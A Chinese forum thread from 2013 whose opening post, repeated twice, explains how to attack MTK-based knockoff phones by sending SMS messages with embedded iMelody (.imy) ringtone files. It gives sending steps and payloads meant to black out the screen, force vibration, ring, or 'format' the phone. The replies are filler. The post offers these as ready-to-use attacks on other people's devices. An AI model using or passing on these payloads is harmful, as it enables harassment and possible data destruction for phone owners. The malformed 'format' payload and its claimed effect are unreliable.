edit_note帖子
386
stars积分
53,287
event加入
2011-06-21
怀旧国机
用短信攻击手机的代码
schedule发表于 2013-08-17 23:57:00
visibility查看 774
chat_bubble回复 69
#1 楼主
影响手机品牌:所有MTK方案手机(也就是我们常说的山寨手机)且写短信时有【选项—插入对象—我的铃声】这一功能(大部分山寨手机都有此功能)
漏洞原理:
在大部分MTK方案手机中,编写短信息的时候可以插入一种“imy”格式的铃声文件,而具有同样功能的手机接收到此短信后在查看信息内容的同时可以听到短信息内插入的铃声,由于MTK方案手机在阅读短信息的时候对“imy”文件内容不经过滤而直接执行。所以我们可以在“imy”文件内插入代码,通过代码调用手机的解码芯片发出一些声音甚至一些核心指令。通过这种方式可实现对MTK方案手机的短信攻击
*作方式:
在电脑上新建文本文档,写入代码,保存为“imy”格式文件,将这个文件放入手机的“Audio”文件夹内(注意一定是手机的“Audio”文件夹,而非内存卡上)
用手机编辑短信,【选项—插入对象—我的铃声】选择你写的“imy”文件,完成,发送
黑屏代码:
BEGIN:IMELODY
BEAT:1200
MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600)
END:IMELODY
猛震代码:
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:100
MELODY:(ledoffledonbackoffbackonvibeon@300)
END:IMELODY
振铃代码:
BEGIN:IMELODY VERSION:1.2
FORMAT:CLASS1.0
BEAT:200
MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200)
END:IMELODY
格式化代码:(慎用)
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
COMPOSER:MTK(23)Fomat
BEAT:180
MELODY:backoffbackofffbackoffbackoffbackoffbackoffbackoffbackoffbackoff
(+“@9999999999999999999999999“>“+<melody>+“@9999999999999999999999999)“
漏洞原理:
在大部分MTK方案手机中,编写短信息的时候可以插入一种“imy”格式的铃声文件,而具有同样功能的手机接收到此短信后在查看信息内容的同时可以听到短信息内插入的铃声,由于MTK方案手机在阅读短信息的时候对“imy”文件内容不经过滤而直接执行。所以我们可以在“imy”文件内插入代码,通过代码调用手机的解码芯片发出一些声音甚至一些核心指令。通过这种方式可实现对MTK方案手机的短信攻击
*作方式:
在电脑上新建文本文档,写入代码,保存为“imy”格式文件,将这个文件放入手机的“Audio”文件夹内(注意一定是手机的“Audio”文件夹,而非内存卡上)
用手机编辑短信,【选项—插入对象—我的铃声】选择你写的“imy”文件,完成,发送
黑屏代码:
BEGIN:IMELODY
BEAT:1200
MELODY:(ledoffbackoffvibeoffr5ledoffbackoffvibeoffr5@600)
END:IMELODY
猛震代码:
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:100
MELODY:(ledoffledonbackoffbackonvibeon@300)
END:IMELODY
振铃代码:
BEGIN:IMELODY VERSION:1.2
FORMAT:CLASS1.0
BEAT:200
MELODY:(ledoffbackoffvibeonr5vibeoffledonbackonr5@200)
END:IMELODY
格式化代码:(慎用)
BEGIN:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
COMPOSER:MTK(23)Fomat
BEAT:180
MELODY:backoffbackofffbackoffbackoffbackoffbackoffbackoffbackoffbackoff
(+“@9999999999999999999999999“>“+<melody>+“@9999999999999999999999999)“
全部回复 (69)
2013-08-18 12:42:00
#42
。。。。。。。。
2013-08-18 12:45:00
#43
,,,
2013-08-18 12:55:00
#44
???怎莫回事
2013-08-18 12:58:00
#45
既然咯
2013-08-18 13:15:00
#46
11111
2013-08-18 15:24:00
#47
啧啧啧啧啧啧
2013-08-18 15:49:00
#48
A哦
2013-08-18 17:54:00
#49
溜溜
2013-08-18 18:01:00
#50
软罐头研究
2013-08-19 05:12:00
#51
123456,
2013-08-19 18:17:00
#52
啊啊啊啊啊啊啊啊啊
2013-08-19 18:17:00
#53
啊啊啊啊啊啊啊啊啊猜猜
2013-08-25 01:50:00
#54
,。,
2013-09-05 22:45:00
#55
给予
2013-09-27 16:20:00
#56
恩泸州
2013-09-28 19:51:00
#57
给你
2013-10-02 15:49:00
#58
图
2013-10-19 00:26:00
#59
啦啦啦
2013-10-23 09:43:00
#60
嗯嗯嗯嗯
2014-04-11 18:19:00
#61
兔兔
登录 后才能回复
flag举报帖子